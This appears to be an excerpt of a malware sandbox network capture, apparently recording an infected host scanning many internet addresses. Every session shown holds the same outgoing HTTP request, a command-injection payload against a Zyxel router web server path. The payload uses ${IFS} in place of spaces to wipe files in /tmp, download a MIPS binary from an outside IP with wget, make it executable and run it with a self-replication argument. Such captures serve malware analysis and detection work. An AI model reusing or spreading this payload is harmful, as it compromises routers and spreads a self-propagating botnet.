                                              Jan 29, 2024 07:03:53.076307058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5255192.168.2.1455132211.139.173.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076334953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5256192.168.2.145214653.193.21.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076358080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5257192.168.2.1448078160.100.205.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076395988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5258192.168.2.1454720150.104.8.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076457024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5259192.168.2.1435896134.218.15.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076487064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5260192.168.2.1446496172.239.54.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076539040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5261192.168.2.144013897.222.172.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076584101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5262192.168.2.1448696185.227.230.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076625109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5263192.168.2.1456830117.137.91.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076644897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5264192.168.2.1458308149.17.130.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076679945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5265192.168.2.1455016221.0.120.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076704979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5266192.168.2.143881484.237.66.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076745987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5267192.168.2.1436994186.166.229.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.076778889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5268192.168.2.145240665.111.119.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.080050945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5269192.168.2.145585623.223.115.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.080104113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5270192.168.2.1457216155.165.122.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089030981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5271192.168.2.1459230130.60.153.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089067936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5272192.168.2.144162684.194.16.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089118958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5273192.168.2.1452396188.242.91.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089135885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5274192.168.2.1456956188.133.163.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089169979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5275192.168.2.144451064.51.151.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089200020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5276192.168.2.1449474125.128.40.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089250088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5277192.168.2.1450484154.10.53.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089293003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5278192.168.2.1451232213.56.98.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089334011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5279192.168.2.1455904176.172.47.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089380980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5280192.168.2.1435102153.88.36.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089418888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5281192.168.2.1436832119.189.118.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089462042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5282192.168.2.144383417.253.229.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089502096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5283192.168.2.1458228145.174.37.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089536905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5284192.168.2.143413479.157.55.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089591980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5285192.168.2.14395921.89.42.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089622974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5286192.168.2.145788013.231.54.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089669943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5287192.168.2.1438506185.234.255.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089709997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5288192.168.2.145385673.157.217.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089757919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5289192.168.2.14344665.183.199.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089791059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5290192.168.2.143597257.70.224.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089845896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5291192.168.2.145078417.94.196.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089867115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5292192.168.2.1448914140.177.211.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089903116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5293192.168.2.143581083.135.36.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.089945078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5294192.168.2.1441584101.238.69.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090007067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5295192.168.2.1452642189.56.59.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090038061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5296192.168.2.1444254139.96.94.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090090990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5297192.168.2.143649489.82.44.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090121031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5298192.168.2.1449066202.65.207.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090161085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5299192.168.2.1437126115.210.238.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090194941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5300192.168.2.145913086.139.80.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090246916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5301192.168.2.144233638.211.41.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090270996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5302192.168.2.1433290174.20.229.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090306044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5303192.168.2.143981013.119.228.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090348005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5304192.168.2.144647832.133.105.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090420008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5305192.168.2.1442504106.2.227.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090439081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5306192.168.2.1448646114.31.69.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090491056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5307192.168.2.146019899.179.32.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090532064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5308192.168.2.1435732119.7.154.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090562105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5309192.168.2.145463485.11.134.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090585947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5310192.168.2.143784866.212.59.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090624094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5311192.168.2.144762213.248.18.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090734005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5312192.168.2.144618634.204.75.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090778112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5313192.168.2.145536891.204.2.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090818882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5314192.168.2.145426460.230.18.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090859890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5315192.168.2.145062459.5.247.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090893984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5316192.168.2.144175285.104.159.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090928078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5317192.168.2.144456685.136.219.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.090965986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5318192.168.2.1458222179.235.238.207443
                                              TimestampBytes transferredDirectionData
